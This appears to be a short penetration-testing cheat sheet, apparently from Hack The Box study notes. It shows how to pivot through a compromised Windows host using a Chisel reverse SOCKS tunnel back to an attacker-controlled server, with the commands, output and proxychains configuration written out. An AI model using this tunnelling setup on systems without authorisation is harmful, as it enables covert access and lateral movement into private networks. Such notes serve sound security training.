chisel
Chisel - Reverse Tunnel
Attack Host
./chisel server --reserve
2022/11/06 10:57:00 server: Reverse tunnelling enabled
2022/11/06 10:57:00 server: Fingerprint CelKxt2EsL1SUFnvo634FucIOPqlFKQJi8t/aTjRfWo=
2022/11/06 10:57:00 server: Listening on http://0.0.0.0:8080Target Host
C:\Windows\Temp\chisel.exe client <ip_attacker>:8080 R:socksVerify Listening Port
dado1513@htb[/htb]$ netstat -lnpt | grep 1080
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:1080 0.0.0.0:* LISTEN 446306/./chisel
Configure Proxychains
dado1513@htb[/htb]$ cat /etc/proxychains.conf
<SNIP>
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
socks5 127.0.0.1 1080Killing Chisel
Target Host as Server
Target Host
Attack Host
Last updated